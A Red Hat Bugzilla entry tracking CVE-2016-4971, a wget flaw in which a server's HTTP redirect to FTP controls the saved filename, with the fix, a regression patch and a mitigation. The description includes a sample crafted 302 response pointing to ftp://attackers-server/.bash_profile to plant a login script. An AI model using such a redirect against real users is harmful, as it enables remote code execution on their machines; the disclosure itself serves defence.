1343666 – (CVE-2016-4971) CVE-2016-4971 wget: Lack of filename checking allows arbitrary file upload via FTP redirect

Bug 1343666 (CVE-2016-4971) - CVE-2016-4971 wget: Lack of filename checking allows arbitrary file upload via FTP redirect

Summary: CVE-2016-4971 wget: Lack of filename checking allows arbitrary file upload vi...

Keywords:
Status:	CLOSED ERRATA
Alias:	CVE-2016-4971
Product:	Security Response
Classification:	Other
Component:	vulnerability
Sub Component:
Version:	unspecified
Hardware:	All
OS:	Linux
Priority:	medium
Severity:	medium
Target Milestone:	---
Assignee:	Red Hat Product Security
QA Contact:
Docs Contact:
URL:
Whiteboard:
Depends On:	Engineering1345778
Blocks:	Embargoed1323912 Embargoed1343668
TreeView+	depends on / blocked

Reported:	2016-06-07 15:55 UTC by Adam Mariš
Modified:	2021-02-17 03:44 UTC (History)
CC List:	5 users (show)
Fixed In Version:
Doc Type:	If docs needed, set a value
Doc Text:	It was found that wget used a file name provided by the server for the downloaded file when following a HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client.
Clone Of:
Environment:
Last Closed:	2019-06-08 02:54:42 UTC

Attachments	(Terms of Use)
Proposed upstream patch (12.04 KB, patch) 2016-06-07 15:56 UTC, Adam Mariš	no flags	Details \| Diff
View All

Links
System	ID	Private	Priority	Status	Summary	Last Updated
Red Hat Product Errata	RHSA-2016:2587	0	normal	SHIPPED_LIVE	Moderate: wget security and bug fix update	2016-11-03 12:09:33 UTC

Description Adam Mariš 2016-06-07 15:55:19 UTC

GNU Wget (including the latest version) when supplied with a malicious website link can be tricked into saving an arbitrary remote file supplied by an attacker, with arbitrary contents and filename under the current directory. This can lead to potential code execution by creating system scripts (such as .bash_profile and others) within home directory as well as other unauthorized actions (such as request sniffing by proxy modification, or arbitrary system file retrieval) by uploading .wgetrc configuration file.

Because of lack of sufficient controls in wget, when user downloads a file with wget, such as:

wget http://attackers-server/safe_file.txt

An attacker who controls the server could make wget create an arbitrary file with arbitrary contents and filename by issuing a crafted HTTP 30X Redirect containing ftp server reference in response to the victim's wget request. 

For example, if the attacker's server replies with the following response:

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: ftp://attackers-server/.bash_profile
Content-Length: 262
Server: Apache

wget will automatically follow the redirect and will download a malicious .bash_profile file from a malicious FTP server. It will fail to rename the file to the originally requested filename of 'safe_file.txt' as it would normally do, in case of a redirect to another HTTP resource with a different name.

Because of this vulnerability, an attacker is able to upload an arbitrary file with an arbitrary filename to the victim's current directory.

Comment 1 Adam Mariš 2016-06-07 15:55:24 UTC

Acknowledgments:

Name: GNU wget project
Upstream: Dawid Golunski

Comment 2 Adam Mariš 2016-06-07 15:56:13 UTC

Created attachment 1165694 [details]
Proposed upstream patch

Comment 4 Giuseppe Scrivano 2016-06-09 16:37:54 UTC

I've just released wget 1.18 with the fix:

ftp://ftp.gnu.org/gnu/wget/wget-1.18.tar.xz

I am going to publicly announce the new version in few hours

Comment 6 Dhiru Kholia 2016-06-14 08:09:42 UTC

Public via https://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html

Comment 7 Adam Mariš 2016-06-23 10:15:19 UTC

CVE patch made a regression, this one fixes it:

http://git.savannah.gnu.org/cgit/wget.git/commit/?id=59b920874daa565a1323ffa1e756e80493190686

Comment 8 Dhiru Kholia 2016-07-08 09:31:10 UTC

Mitigation:

Use wget with "-O" option to explicitly specify the output filename.

Comment 10 Andrej Nemec 2016-07-11 07:21:18 UTC

References:

http://seclists.org/oss-sec/2016/q3/34

Comment 11 errata-xmlrpc 2016-11-03 20:18:24 UTC

This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7

Via RHSA-2016:2587 https://rhn.redhat.com/errata/RHSA-2016-2587.html

Note You need to log in before you can comment on or make changes to this bug.